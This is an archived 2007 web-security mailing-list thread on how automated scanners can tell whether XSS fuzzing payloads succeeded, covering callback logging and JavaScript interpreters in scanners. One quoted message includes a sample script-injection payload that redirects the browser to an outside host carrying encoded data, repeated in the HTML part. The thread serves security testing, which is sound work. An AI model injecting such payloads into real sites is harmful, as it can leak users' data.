Re: [WEB SECURITY] How to detect XSS in an automated fashion

["James Landis" <jcl24@xxxxxxxxxxx>]

------=_Part_5150_17815213.1188494187417
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

It doesn't look like anyone has tried to make the distinction here between
reflected and stored XSS. Fuzzing makes a lot of sense for catching
reflected vulns, but they're also a lot lower in value than stored.
Automated runtime testing for stored XSS gets a lot more complicated, and I
have yet to see a solid approach to that problem. It's theoretically pretty
simple, but in practice I could see it getting out of hand very quickly.

-j

On 8/30/07, Billy Hoffman <Billy.Hoffman@spidynamics.com> wrote:
>
> Not bad, but this isn't great either. Ignoring how you gain code
> execution (<script> tag, scriptable attribute, javascript href, CSS,
> etc), your "call back to a server" logging method requires the following
> 5 special characters: . = : / ?
>
> While piggybacking on the browser certain works for a quick tool, you
> really need to embed a full JavaScript interpreter into your scan and be
> able to control DOM events, properties, etc. Then you confirmation step
> can be as simple as setting a variable!
>
> Trust me, I've been down this road before. Go look at Mozilla's Rhino or
> SpiderMonkey if the licensing works for your project.
>
> Billy Hoffman
> --
> Lead Researcher, SPI Labs
> SPI Dynamics, An HP Company
> http://www.spidynamics.com
> Phone:  678-781-4800
> Direct:   678-781-4845
> Attend SPICON 2.0 - SPI Dynamics' User Conference - and earn CPE
> credits.
> Sign up today at http://www.spicon2007.com/.
>
> -----Original Message-----
> From: gaz_sec@hushmail.com [mailto:gaz_sec@hushmail.com]
> Sent: Wednesday, August 29, 2007 9:42 PM
> To: websecurity@webappsec.org; Billy Hoffman
> Cc: travisaltman@gmail.com
> Subject: RE: [WEB SECURITY] How to detect XSS in an automated fashion
>
> I've thought about a XSS fuzzer a bit more now, you'll have to
> excuse me but it's 2.30am here :) Right the best way to do it in my
> opinion is:-
>
> 1. Base site contains a iframe with the target site in.
> 2. The base site sends XSS fuzz to the target site through
> javascript location.
> 3. The fuzzer contains javascript code to log the results back to a
> server side script. E.g.
> <script>self.location='http://yoursite.com?logresults?fuzzResult=Fuz
> zBaseEncoded'</script>
>
>
> On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman
> <Billy.Hoffman@spidynamics.com> wrote:
> >Of course, that only works if your web scanner has a JavaScript
> >interpreter!
> >
> >Billy
> >
> >-----Original Message-----
> >From: gaz_sec@hushmail.com [mailto:gaz_sec@hushmail.com]
> >Sent: Wed 8/29/2007 3:03 PM
> >To: websecurity@webappsec.org
> >Cc: travisaltman@gmail.com
> >Subject: Re: [WEB SECURITY] How to detect XSS in an automated
> >fashion
> >
> >Hi Travis
> >
> >I've wrote a HTML/JS Fuzzer in which I encountered the same
> >problem. I decided to create a simple javascript callback which
> >was
> >executed on successful fuzz. I base encoded the result and sent
> >the
> >information via a normal HTML image (really a PHP script) which
> >logged the results.
> >
> >Cheers
> >
> >Gareth
> >
> >On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman
> ><travisaltman@gmail.com> wrote:
> >>I am trying to run through a dictionary of XSS attacks (aka
> >>fuzzing) on a
> >>web application.  What is the best way to determine, in an
> >>automated
> >>fashion, if each attack was successful?  Would I simply review
> >the
> >>source
> >>code of the response to see if my attack was encoded or filtered?
> >>
> >>http://travisaltman.com
> >
> >--
> >Click to reduce wrinkles, increase energy and drive - anti-aging.
> >http://tagline.hushmail.com/fc/Ioyw6h4dWDHmHiSvMyDeVPgVWtCgUCy5Ky07
> >XGWad22ySq1P1RSIOW/
> >
> >
> >-------------------------------------------------------------------
> >---------
> >Join us on IRC: irc.freenode.net #webappsec
> >
> >Have a question? Search The Web Security Mailing List Archives:
> >http://www.webappsec.org/lists/websecurity/
> >
> >Subscribe via RSS:
> >http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> --
> Click to reduce wrinkles, increase energy and drive - anti-aging.
> http://tagline.hushmail.com/fc/Ioyw6h4dWDHVfywNwP9evw7ksS1ajcnZa81mdkZe4
> yQdEP7hqEvZMm/
>
>
> ------------------------------------------------------------------------
> ----
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>

------=_Part_5150_17815213.1188494187417
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

It doesn&#39;t look like anyone has tried to make the distinction here between reflected and stored XSS. Fuzzing makes a lot of sense for catching reflected vulns, but they&#39;re also a lot lower in value than stored. Automated runtime testing for stored XSS gets a lot more complicated, and I have yet to see a solid approach to that problem. It&#39;s theoretically pretty simple, but in practice I could see it getting out of hand very quickly.
<br><br>-j<br><br><div><span class="gmail_quote">On 8/30/07, <b class="gmail_sendername">Billy Hoffman</b> &lt;<a href="mailto:Billy.Hoffman@spidynamics.com";>Billy.Hoffman@spidynamics.com</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Not bad, but this isn&#39;t great either. Ignoring how you gain code<br>execution (&lt;script&gt; tag, scriptable attribute, javascript href, CSS,<br>etc), your &quot;call back to a server&quot; logging method requires the following
<br>5 special characters: . = : / ?<br><br>While piggybacking on the browser certain works for a quick tool, you<br>really need to embed a full JavaScript interpreter into your scan and be<br>able to control DOM events, properties, etc. Then you confirmation step
<br>can be as simple as setting a variable!<br><br>Trust me, I&#39;ve been down this road before. Go look at Mozilla&#39;s Rhino or<br>SpiderMonkey if the licensing works for your project.<br><br>Billy Hoffman<br>--<br>Lead Researcher, SPI Labs
<br>SPI Dynamics, An HP Company<br><a href="http://www.spidynamics.com";>http://www.spidynamics.com</a><br>Phone:&nbsp;&nbsp;678-781-4800<br>Direct:&nbsp;&nbsp; 678-781-4845<br>Attend SPICON 2.0 - SPI Dynamics&#39; User Conference - and earn CPE
<br>credits.<br>Sign up today at <a href="http://www.spicon2007.com/";>http://www.spicon2007.com/</a>.<br><br>-----Original Message-----<br>From: <a href="mailto:gaz_sec@hushmail.com";>gaz_sec@hushmail.com</a> [mailto:<a href="mailto:gaz_sec@hushmail.com";>
gaz_sec@hushmail.com</a>]<br>Sent: Wednesday, August 29, 2007 9:42 PM<br>To: <a href="mailto:websecurity@webappsec.org";>websecurity@webappsec.org</a>; Billy Hoffman<br>Cc: <a href="mailto:travisaltman@gmail.com";>travisaltman@gmail.com
</a><br>Subject: RE: [WEB SECURITY] How to detect XSS in an automated fashion<br><br>I&#39;ve thought about a XSS fuzzer a bit more now, you&#39;ll have to<br>excuse me but it&#39;s 2.30am here :) Right the best way to do it in my
<br>opinion is:-<br><br>1. Base site contains a iframe with the target site in.<br>2. The base site sends XSS fuzz to the target site through<br>javascript location.<br>3. The fuzzer contains javascript code to log the results back to a
<br>server side script. E.g.<br>&lt;script&gt;self.location=&#39;http://yoursite.com?logresults?fuzzResult=Fuz<br>zBaseEncoded&#39;&lt;/script&gt;<br><br><br>On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman<br>&lt;<a href="mailto:Billy.Hoffman@spidynamics.com";>
Billy.Hoffman@spidynamics.com</a>&gt; wrote:<br>&gt;Of course, that only works if your web scanner has a JavaScript<br>&gt;interpreter!<br>&gt;<br>&gt;Billy<br>&gt;<br>&gt;-----Original Message-----<br>&gt;From: <a href="mailto:gaz_sec@hushmail.com";>
gaz_sec@hushmail.com</a> [mailto:<a href="mailto:gaz_sec@hushmail.com";>gaz_sec@hushmail.com</a>]<br>&gt;Sent: Wed 8/29/2007 3:03 PM<br>&gt;To: <a href="mailto:websecurity@webappsec.org";>websecurity@webappsec.org</a><br>&gt;Cc: 
<a href="mailto:travisaltman@gmail.com";>travisaltman@gmail.com</a><br>&gt;Subject: Re: [WEB SECURITY] How to detect XSS in an automated<br>&gt;fashion<br>&gt;<br>&gt;Hi Travis<br>&gt;<br>&gt;I&#39;ve wrote a HTML/JS Fuzzer in which I encountered the same
<br>&gt;problem. I decided to create a simple javascript callback which<br>&gt;was<br>&gt;executed on successful fuzz. I base encoded the result and sent<br>&gt;the<br>&gt;information via a normal HTML image (really a PHP script) which
<br>&gt;logged the results.<br>&gt;<br>&gt;Cheers<br>&gt;<br>&gt;Gareth<br>&gt;<br>&gt;On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman<br>&gt;&lt;<a href="mailto:travisaltman@gmail.com";>travisaltman@gmail.com</a>&gt; wrote:
<br>&gt;&gt;I am trying to run through a dictionary of XSS attacks (aka<br>&gt;&gt;fuzzing) on a<br>&gt;&gt;web application.&nbsp;&nbsp;What is the best way to determine, in an<br>&gt;&gt;automated<br>&gt;&gt;fashion, if each attack was successful?&nbsp;&nbsp;Would I simply review
<br>&gt;the<br>&gt;&gt;source<br>&gt;&gt;code of the response to see if my attack was encoded or filtered?<br>&gt;&gt;<br>&gt;&gt;<a href="http://travisaltman.com";>http://travisaltman.com</a><br>&gt;<br>&gt;--<br>&gt;Click to reduce wrinkles, increase energy and drive - anti-aging.
<br>&gt;<a href="http://tagline.hushmail.com/fc/Ioyw6h4dWDHmHiSvMyDeVPgVWtCgUCy5Ky07";>http://tagline.hushmail.com/fc/Ioyw6h4dWDHmHiSvMyDeVPgVWtCgUCy5Ky07</a><br>&gt;XGWad22ySq1P1RSIOW/<br>&gt;<br>&gt;<br>&gt;-------------------------------------------------------------------
<br>&gt;---------<br>&gt;Join us on IRC: <a href="http://irc.freenode.net";>irc.freenode.net</a> #webappsec<br>&gt;<br>&gt;Have a question? Search The Web Security Mailing List Archives:<br>&gt;<a href="http://www.webappsec.org/lists/websecurity/";>
http://www.webappsec.org/lists/websecurity/</a><br>&gt;<br>&gt;Subscribe via RSS:<br>&gt;<a href="http://www.webappsec.org/rss/websecurity.rss";>http://www.webappsec.org/rss/websecurity.rss</a> [RSS Feed]<br><br>--<br>Click to reduce wrinkles, increase energy and drive - anti-aging.
<br><a href="http://tagline.hushmail.com/fc/Ioyw6h4dWDHVfywNwP9evw7ksS1ajcnZa81mdkZe4";>http://tagline.hushmail.com/fc/Ioyw6h4dWDHVfywNwP9evw7ksS1ajcnZa81mdkZe4</a><br>yQdEP7hqEvZMm/<br><br><br>------------------------------------------------------------------------
<br>----<br>Join us on IRC: <a href="http://irc.freenode.net";>irc.freenode.net</a> #webappsec<br><br>Have a question? Search The Web Security Mailing List Archives:<br><a href="http://www.webappsec.org/lists/websecurity/";>
http://www.webappsec.org/lists/websecurity/</a><br><br>Subscribe via RSS:<br><a href="http://www.webappsec.org/rss/websecurity.rss";>http://www.webappsec.org/rss/websecurity.rss</a> [RSS Feed]<br><br><br>----------------------------------------------------------------------------
<br>Join us on IRC: <a href="http://irc.freenode.net";>irc.freenode.net</a> #webappsec<br><br>Have a question? Search The Web Security Mailing List Archives:<br><a href="http://www.webappsec.org/lists/websecurity/";>http://www.webappsec.org/lists/websecurity/
</a><br><br>Subscribe via RSS:<br><a href="http://www.webappsec.org/rss/websecurity.rss";>http://www.webappsec.org/rss/websecurity.rss</a> [RSS Feed]<br><br></blockquote></div><br>

------=_Part_5150_17815213.1188494187417--